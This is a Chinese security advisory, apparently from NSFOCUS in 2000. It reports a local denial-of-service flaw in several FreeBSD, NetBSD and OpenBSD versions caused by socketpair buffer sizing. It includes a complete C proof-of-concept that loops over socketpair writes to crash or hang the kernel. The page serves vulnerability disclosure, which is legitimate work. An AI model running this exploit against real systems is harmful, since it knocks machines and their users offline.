首页 -> 安全研究

安全研究

安全漏洞
多种*BSD系统存在本地拒绝服务漏洞

发布日期:2000-06-06
更新日期:2000-06-06

受影响系统:
FreeBSD FreeBSD 5.0
FreeBSD FreeBSD 4.0
FreeBSD FreeBSD 3.4
FreeBSD FreeBSD 3.3
FreeBSD FreeBSD 3.2
FreeBSD FreeBSD 3.1
NetBSD NetBSD 1.4.2
NetBSD NetBSD 1.4.1
OpenBSD OpenBSD 2.7
OpenBSD OpenBSD 2.6
OpenBSD OpenBSD 2.5
描述:

在所有的BSD系列的操作系统中存在一个本地的拒绝服务漏洞。这个问题与设置
socketpair发送和接收缓冲区大小有关,当设置它们的大小为某个特定的值,并
用这个值进行写操作时,将导致FreeBSD系统崩溃,NetBSD和OpenBSD系统并不会
崩溃,但是网络服务将会停止响应。

<* 来源: Underground Security Systems Research  (http://www.ussrback.com)
          Sven Berkenvs
*>



测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!


#include        <unistd.h>
#include        <sys/socket.h>
#include        <fcntl.h>

#define         BUFFERSIZE      204800

extern  int
main(void)
{
        int             p[2], i;
        char            crap[BUFFERSIZE];

        while (1)
        {
                if (socketpair(AF_UNIX, SOCK_STREAM, 0, p) == -1)
                        break;
                i = BUFFERSIZE;
                setsockopt(p[0], SOL_SOCKET, SO_RCVBUF, &i,
sizeof(int));
                setsockopt(p[0], SOL_SOCKET, SO_SNDBUF, &i,
sizeof(int));
                setsockopt(p[1], SOL_SOCKET, SO_RCVBUF, &i,
sizeof(int));
                setsockopt(p[1], SOL_SOCKET, SO_SNDBUF, &i,
sizeof(int));
                fcntl(p[0], F_SETFL, O_NONBLOCK);
                fcntl(p[1], F_SETFL, O_NONBLOCK);
                write(p[0], crap, BUFFERSIZE);
                write(p[1], crap, BUFFERSIZE);
        }
        exit(0);
}



建议:

暂无

浏览次数:6349
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障